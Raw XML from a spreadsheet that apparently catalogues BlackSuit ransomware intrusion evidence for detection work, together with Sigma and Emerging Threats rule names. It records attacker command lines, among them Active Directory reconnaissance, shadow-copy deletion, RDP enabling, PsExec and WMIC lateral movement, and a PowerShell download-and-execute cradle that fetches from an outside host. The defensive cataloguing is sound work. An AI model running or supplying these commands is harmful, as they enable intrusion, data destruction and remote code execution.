    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0025"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net group &quot;domain admins&quot; /domain "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0026"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net group &quot;domain admins&quot; /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0027"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="nltest /dclist:&lt;DOMAINNAME&gt;.local"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0028"/>
    <s v="wmic-pid"/>
    <s v="cmdline"/>
    <s v="WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0029"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net user &lt;PRIV_USER&gt; /domain "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0030"/>
    <m/>
    <s v="cmdline"/>
    <s v="ping &lt;workstation1&gt;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0031"/>
    <m/>
    <s v="cmdline"/>
    <s v="ping &lt;workstation2&gt;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0032"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net view //&lt;IP1&gt;/"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0033"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net view \\&lt;IP1&gt;\"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0034"/>
    <s v="nltest-pid"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts /all_trusts "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0035"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net view \\&lt;IP2&gt;\"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0036"/>
    <s v="nltest-pid"/>
    <s v="cmdline"/>
    <s v="nltest /dclist:&lt;DOMAIN&gt;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0037"/>
    <m/>
    <s v="cmdline"/>
    <s v="ping &lt;DOMAIN&gt; "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0038"/>
    <s v="nltest-pid"/>
    <s v="cmdline"/>
    <s v="nltest /FINDUSER:REDACTED"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0039"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;winevtx_7045&quot;, &quot;service_name&quot;: &quot;1221c5c&quot;, &quot;service_file_name&quot;: &quot;%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand &lt;encode&gt;&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0040"/>
    <m/>
    <s v="cmdline"/>
    <s v="$ target-query &lt;REDACTED&gt; -f edge.downloads | rdump -f '{browser} downloaded {path} from {url} {size} via {tab_referrer_url}'_x000a_edge downloaded C:\Users\&lt;REDACTED&gt;\Downloads\winrar-x64-701.exe from https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-701.exe 3.77 MB via https://www.bing.com/_x000a_edge downloaded C:\Users\&lt;REDACTED&gt;\Downloads\winrar-x64-701 (1).exe from https://www.win-rar.com/fileadmin/winrar-versions/winrar/winrar-x64-701.exe 3.77 MB via https://www.bing.com/"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0041"/>
    <m/>
    <s v="cmdline"/>
    <s v="&quot;C:\Program Files\WinRAR\WinRAR.exe&quot; a -ep1  -scul -r0 -iext   -imon1 -- . G:\REDACTED"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0042"/>
    <m/>
    <s v="wmic"/>
    <s v="%WINDIR%\system32\cmd.exe /C wmic /node:&quot;REDACTED&quot; process call create &quot;%WINDIR%\Temp\svhost.exe &quot;143.244.146[.]183&quot;&quot; "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0043"/>
    <s v="psexec"/>
    <s v="cmdline"/>
    <s v="psexec.exe @c:\share$\comps1.txt -u &lt;uname&gt; -p &lt;pwd&gt; cmd /c copy &quot;\&lt;device&gt;\share$123.exe&quot; &quot;c:\windows\temp&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0044"/>
    <s v="vss"/>
    <s v="cmdline"/>
    <s v="cmd.exe /c vssadmin delete shadows /all /quiet"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0045"/>
    <s v="wmic-pid"/>
    <s v="generic"/>
    <s v="wmic used to execute malware on domain controller"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0046"/>
    <m/>
    <s v="sigma"/>
    <s v="2aa0a6b4-a865-495b-ab51-c28249537b75 - Startup Folder File Write"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0047"/>
    <m/>
    <s v="sigma"/>
    <s v="36e037c4-c228-4866-b6a3-48eb292b9955 - DNS Query Request By Regsvr32.EXE"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0048"/>
    <s v="wmic-pid"/>
    <s v="sigma"/>
    <s v="526be59f-a573-4eea-b5f7-f0973207634d - New Process Created Via Wmic.EXE"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0049"/>
    <s v="nltest-pid"/>
    <s v="sigma"/>
    <s v="5cc90652-4cbd-4241-aa3b-4b462fa5a248 - Potential Recon Activity Via Nltest.EXE"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0050"/>
    <s v="wmic-pid"/>
    <s v="sigma"/>
    <s v="e568650b-5dcd-4658-8f34-ded0b1e13992 - Potential Product Class Reconnaissance Via Wmic.EXE"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0051"/>
    <m/>
    <s v="sigma"/>
    <s v="d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 - Suspicious Group And Account Reconnaissance Activity Using Net.EXE"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0052"/>
    <m/>
    <s v="sigma"/>
    <s v="0ef56343-059e-4cb6-adc1-4c3c967c5e46 - Suspicious Execution of Systeminfo"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0053"/>
    <m/>
    <s v="sigma"/>
    <s v="62510e69-616b-4078-b371-847da438cc03 - Share And Session Enumeration Using Net.EXE"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0054"/>
    <m/>
    <s v="sigma"/>
    <s v="d7a95147-145f-4678-b85d-d1ff4a3bb3f6 - CobaltStrike Service Installations - Security"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0055"/>
    <m/>
    <s v="sigma"/>
    <s v="bd8b828d-0dca-48e1-8a63-8a58ecf2644f - Group Membership Reconnaissance Via Whoami.EXE"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0056"/>
    <m/>
    <s v="sigma"/>
    <s v="fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba - PsExec Tool Execution"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0057"/>
    <m/>
    <s v="sigma"/>
    <s v="c947b146-0abc-4c87-9c64-b17e9d7274a2 - Shadow Copies Deletion Using Operating Systems Utilities"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0058"/>
    <m/>
    <s v="sigma"/>
    <s v="15619216-e993-4721-b590-4c520615a67d - Potential Meterpreter/CobaltStrike Activity"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0059"/>
    <m/>
    <s v="sigma_dfir"/>
    <s v="e6be809d-adfd-473b-b1f5-4a3cc5938df1 - Suspicious RAR Archive Download From temp.sh  _x000a_b8a5dde0-fb1c-466e-832e-5a9b33e59b69 - Suspicious Temp File Lookup for Steam User Profile  _x000a_78e4aeff-80ce-4b86-9664-2f0313e960e3 - Potential DLL Side Loading Abuse of IKARUS Security GuardX  _x000a_476d0227-967d-4429-bc02-abe0985275e2 - Potential SectopRAT MSBuild Network communication  _x000a_c475246c-133b-454e-9b9f-963139b4af1a - Adding Hidden Attribute Flag via Command line to Directory  _x000a_c79b4806-b86f-4c6e-a7b8-ecdb4b73fb70 - Detect AV/EDR Solutions Enumeration via WMIC  _x000a_6df37102-c993-4133-ad3d-b12ca32e03c6 - Detect Process Creation via WMIC with Remote Node"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0060"/>
    <m/>
    <s v="etpro"/>
    <s v="ETPRO ADWARE_PUP InnoDownloadPlugin User-Agent Observed_x000a_ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init _x000a_ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)_x000a_ET INFO Observed ZeroSSL SSL/TLS Certificate_x000a_ET POLICY Tunneled RDP msts Handshake_x000a_ET RPC DCERPC SVCCTL - Remote Service Control Manager Access_x000a_ET POLICY PsExec service created"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blacksuit-eid0061"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;winevtx_7045&quot;, &quot;service_name&quot;: &quot;1eaecc0&quot;, &quot;service_file_name&quot;: &quot;%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand &lt;encode&gt;&quot;}"/>
    <s v="psexec_psh"/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0062"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;winevtx_7045&quot;, &quot;service_name&quot;: &quot;161185c1&quot;, &quot;service_file_name&quot;: &quot;ADMIN$\61185c1.exe&quot;}"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0063"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;reg_set&quot;, &quot;target&quot;: &quot;HKU\&lt;user&gt;\Software\Microsoft\Windows\CurrentVersion\Run\socks5&quot;, &quot;file_name&quot;: &quot;c:\user\socks32.exe&quot;}"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0064"/>
    <m/>
    <s v="cmdline"/>
    <s v="c:\Windows\system32\cmd.exe /c echo e6b1e5ac4ae &gt; \\.\pipe\612990"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0065"/>
    <m/>
    <s v="cmdline"/>
    <s v="reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v DenyTSConnections /t REG_DWORD /d 0 /f"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0066"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_create&quot;: &quot;reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v DenyTSConnections /t REG_DWORD /d 0 /f&quot;, &quot;intiating_process_command_line&quot;: &quot;powershell -nop exec bypass -EncodedCommand &lt;encode&gt;&quot;}"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0067"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;winevtx_4768&quot;, &quot;service_name&quot;: &quot;krbtgt&quot;, &quot;pre_auth_type&quot;: &quot;0&quot;, &quot;ticket_type&quot;: &quot;0x17&quot;}"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0068"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_access&quot;, &quot;target_file_path&quot;: &quot;c:\Windows\system32\nstsc.exe&quot;, &quot;source_file_path&quot;: &quot;c:\windows\system32\lsass.exe&quot;, &quot;access&quot;: &quot;0x1010&quot;}"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0069"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c systeminfo"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0070"/>
    <s v="nltest-pid"/>
    <s v="cmdline"/>
    <s v="cmd.exe /c nltest /dclist"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0071"/>
    <m/>
    <s v="htool"/>
    <s v="bloodhound"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0072"/>
    <m/>
    <s v="htool"/>
    <s v="sharphound"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0073"/>
    <m/>
    <s v="generic"/>
    <s v="(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913))&quot;, &quot;(BuildString(&quot;(primarygroupid=*)"/>
    <s v="sharphound ldap search"/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0074"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;winevtx_5145&quot;, &quot;share_name&quot;: &quot;\\*\IPC$&quot;, &quot;target_name&quot;: &quot;srvsvc&quot;}"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0075"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;winevtx_5145&quot;, &quot;share_name&quot;: &quot;\\*\IPC$&quot;, &quot;target_name&quot;: &quot;samr&quot;}"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0076"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;ldap_search&quot;, &quot;search_filter&quot;: &quot;(|samaccounttype=805306369)(samaccounttype=805306369(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913))(objectcategory=organizationalUnit)(objectclass=container)&quot;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0077"/>
    <s v="adfind-pid"/>
    <s v="htool"/>
    <s v="adfind"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0078"/>
    <s v="adfind-pid"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0079"/>
    <s v="adfind-pid"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot; "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0080"/>
    <s v="adfind-pid"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot; "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0081"/>
    <s v="adfind-pid"/>
    <s v="cmdline"/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0082"/>
    <s v="adfind-pid"/>
    <s v="cmdline"/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0083"/>
    <s v="adfind-pid"/>
    <s v="cmdline"/>
    <s v="adfind.exe  -sc trustdmp"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0084"/>
    <s v="adfind-pid"/>
    <s v="cmdline"/>
    <s v="AdFind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0085"/>
    <s v="adfind-pid"/>
    <s v="cmdline"/>
    <s v="AdFind.exe -gcb -sc trustdmp"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0086"/>
    <m/>
    <s v="file_name"/>
    <s v="Get-DataInfo.ps1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0087"/>
    <m/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\\cmd.exe /C systeminfo"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0088"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C net group &quot;domain admins&quot; /domain"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0089"/>
    <s v="nltest-pid"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C nltest /dclist &lt;domainname redacted&gt;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0090"/>
    <s v="nltest-pid"/>
    <s v="cmdline"/>
    <s v="nltest  /domain_trusts /all_trusts"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0091"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C net group &quot;enterprise admins&quot; /domain"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0092"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C ping &lt;hostname redacted&gt;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0093"/>
    <m/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\taskmgr.exe /4"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0094"/>
    <m/>
    <s v="cmdline"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x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0095"/>
    <m/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C route print"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0096"/>
    <m/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C ping http://&lt;IP redacted&gt;/"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0097"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;winevt_4624&quot;, &quot;logon_type&quot;: &quot;9&quot;, &quot;logon_process&quot;, &quot;seclogo&quot;}"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0098"/>
    <m/>
    <s v="generic"/>
    <s v="used SMB ADMIN$ share "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0099"/>
    <m/>
    <s v="generic"/>
    <s v="powershell connected to port 80 in netcon"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0100"/>
    <m/>
    <s v="generic"/>
    <s v="rundll32.exe netcon to port 443"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0101"/>
    <s v="pshell-pid"/>
    <s v="cmdline"/>
    <s v="cmd /c powershell.exe -nop -w hidden -c &quot;IEX ((new-object net.webclient).downloadstring('http://regsvcast.com:80/aecewcfwefwe/&quot;))&quot; "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0102"/>
    <s v="pshell-pid"/>
    <s v="cmdline"/>
    <s v="$s=New-Object IO.MemoryStream(,[convert]::FromBase64String('encoded'); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress)))ReadToEnd();"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0103"/>
    <m/>
    <m/>
    <s v="{&quot;object&quot;: &quot;winevtx_5145&quot;, &quot;share_name&quot;: &quot;\\*\C$&quot;, &quot;target_name&quot;: &quot;tools\socks32.exe&quot;}"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0104"/>
    <m/>
    <s v="sigma_dfir"/>
    <s v="03be05e6-4977-44cd-8ee4-a79400a5ceb0 : Detection of Cobalt Strike Execution_x000a_ded07dbe-bcd4-4d15-a27b-1669445d3215 : Enabling RDP service via reg.exe command execution_x000a_feee5785-1381-4119-95d0-ca0c3fffe2f2 : Potential Kerberoasting Attack Detected_x000a_f8fd3970-d558-40c8-86e2-a989cd53daea : RDP Session from Host with Default Hostname_x000a_194e0132-ddee-433c-ac98-3e544c5a2a3a : Suspicious Powershell Execution in Run Key"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0105"/>
    <s v="nltest-pid"/>
    <s v="sigma"/>
    <s v="903076ff-f442-475a-b667-4f246bcc203b : Nltest.EXE Execution"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0106"/>
    <s v="nltest-pid"/>
    <s v="sigma"/>
    <s v="5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0107"/>
    <s v="adfind-pid"/>
    <s v="sigma"/>
    <s v="9a132afa-654e-11eb-ae93-0242ac130002 : PUA - AdFind Suspicious Execution"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0108"/>
    <m/>
    <s v="sigma"/>
    <s v="d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 : CobaltStrike Named Pipe"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0109"/>
    <m/>
    <s v="sigma"/>
    <s v="496a0e47-0a33-4dca-b009-9e6ca3591f39 : Suspicious Kerberos RC4 Ticket Encryption"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0110"/>
    <m/>
    <s v="sigma"/>
    <s v="8eef149c-bd26-49f2-9e5a-9b00e3af499b : Pass the Hash Activity 2"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0111"/>
    <m/>
    <s v="sigma"/>
    <s v="f376c8a7-a2d0-4ddc-aa0c-16c17236d962 : HackTool - Bloodhound/Sharphound Execution"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0112"/>
    <m/>
    <s v="sigma"/>
    <s v="02773bed-83bf-469f-b7ff-e676e7d78bab : BloodHound Collection Files"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0113"/>
    <s v="mimikatz-pid"/>
    <s v="sigma"/>
    <s v="0d894093-71bc-43c3-8c4d-ecfc28dcf5d9 : Mimikatz Detection LSASS Access"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0114"/>
    <m/>
    <s v="sigma"/>
    <s v="a18dd26b-6450-46de-8c91-9659150cf088 : Potentially Suspicious GrantedAccess Flags On LSASS"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0115"/>
    <m/>
    <s v="sigma"/>
    <s v="098d7118-55bc-4912-a836-dc6483a8d150 : Access To ADMIN$ Network Share"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0116"/>
    <m/>
    <s v="sigma"/>
    <s v="61a7697c-cb79-42a8-a2ff-5f0cdfae0130 : Potential CobaltStrike Service Installations - Registry"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0117"/>
    <m/>
    <s v="sigma"/>
    <s v="1d61f71d-59d2-479e-9562-4ff5f4ead16b : Suspicious Service Installation"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0118"/>
    <m/>
    <s v="sigma"/>
    <s v="4aafb0fa-bff5-4b9d-b99e-8093e659c65f : Writing Local Admin Share"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0119"/>
    <m/>
    <s v="sigma"/>
    <s v="ca2092a1-c273-4878-9b4b-0d60115bf5ea : Suspicious Encoded PowerShell Command Line"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0120"/>
    <m/>
    <s v="sigma"/>
    <s v="0ef56343-059e-4cb6-adc1-4c3c967c5e46 : Suspicious Execution of Systeminfo"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0121"/>
    <m/>
    <s v="sigma"/>
    <s v="bbb7e38c-0b41-4a11-b306-d2a457b7ac2b : Suspicious File Created In PerfLogs"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0122"/>
    <m/>
    <s v="sigma"/>
    <s v="3dfd06d2-eaf4-4532-9555-68aca59f57c4 : Process Execution From A Potentially Suspicious Folder"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blacksuit-eid0123"/>
    <m/>
    <s v="sigma"/>
    <s v="0d5675be-bc88-4172-86d3-1e96a4476536 : Potential Tampering With RDP Related Registry Keys Via Reg.EXE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52648-8962-F049-AACE-F8CAB04A5260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6">
    <pivotField dataField="1" showAll="0"/>
    <pivotField dataField="1"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</pivotFields>
  <rowFields count="1">
    <field x="5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p_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of 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889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:F124" totalsRowShown="0" dataDxfId="5">
  <autoFilter ref="A1:F124" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
  <tableColumns count="6">
    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="4"/>
    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="3"/>
    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="2"/>
    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="1"/>
    <tableColumn id="2" xr3:uid="{794120D3-18F6-5949-81E6-52D88B752F29}" name="description" dataDxfId="0"/>
    <tableColumn id="5" xr3:uid="{85834C32-2D65-CD48-92FE-AB72134D121E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5849-2682-F643-8842-EFF560F6FB5C}">
  <dimension ref="A1:F124"/>
  <sheetViews>
    <sheetView topLeftCell="D45" workbookViewId="0">
      <selection activeCell="F62" sqref="F62:F124"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="17.5" customWidth="1"/>
    <col min="2" max="2" width="21.5" customWidth="1"/>
    <col min="3" max="3" width="13.6640625" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="132.83203125" customWidth="1"/>
    <col min="5" max="5" width="61" customWidth="1"/>
    <col min="6" max="6" width="147.1640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4</v>
      </c>
    </row>
    <row r="2" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A2" s="1" t="s">
        <v>83</v>
      </c>
      <c r="B2" s="1"/>
      <c r="C2" s="1" t="s">
        <v>8</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>9</v>
      </c>
      <c r="E2" s="1"/>
      <c r="F2" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A3" s="1" t="s">
        <v>84</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>10</v>
      </c>
      <c r="E3" s="1"/>
      <c r="F3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="4" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A4" s="1" t="s">
        <v>85</v>
      </c>
      <c r="B4" s="1"/>
      <c r="C4" s="1"/>
      <c r="D4" s="1" t="s">
        <v>13</v>
      </c>
      <c r="E4" s="1" t="s">
        <v>14</v>
      </c>
      <c r="F4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="5" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A5" s="1" t="s">
        <v>86</v>
      </c>
      <c r="B5" s="1"/>
      <c r="C5" s="1" t="s">
        <v>7</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>15</v>
      </c>
      <c r="E5" s="1"/>
      <c r="F5" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A6" s="1" t="s">
        <v>87</v>
      </c>
      <c r="B6" s="1"/>
      <c r="C6" s="1" t="s">
        <v>7</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>16</v>
      </c>
      <c r="E6" s="1"/>
      <c r="F6" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="7" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A7" s="1" t="s">
        <v>88</v>
      </c>
      <c r="B7" s="1"/>
      <c r="C7" s="1" t="s">
        <v>7</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>17</v>
      </c>
      <c r="E7" s="1"/>
      <c r="F7" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="8" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A8" s="1" t="s">
        <v>89</v>
